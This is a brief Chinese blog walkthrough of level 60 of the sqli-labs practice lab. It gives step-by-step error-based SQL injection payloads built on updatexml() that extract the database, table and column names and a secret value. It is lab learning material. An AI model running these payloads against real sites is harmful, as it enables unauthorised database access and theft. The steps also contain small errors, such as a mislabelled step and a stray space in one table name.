Sqli labs less 60

1.常规方法测试 

 

 2.根据错误信息判断闭合方式为")–+,并且为字符型注入

 

 3.查看当前库

?id=1") and updatexml(1,concat(0x7e,(database()),0x7e),1)--+

 

 4.查看库下的所有表88IVGFZVAY

?id=1") and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e),1)--+

 

 5.查看表中的所有数据 sessid,secret_UCFW

?id=1") and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=' 88IVGFZVAY'),0x7e),1)--+

 

 6.查看secret_UCFW表下的所有内容 k3yriX7FRIUL1KKbfIYuti4c

?id=1") and updatexml(1,concat(0x7e,(select group_concat(secret_UCFW) from challenges.88IVGFZVAY),0x7e),1)--+

 

posted @ 2021-09-26 17:23  Nuyoah_QQ  阅读(38)  评论(0)    收藏  举报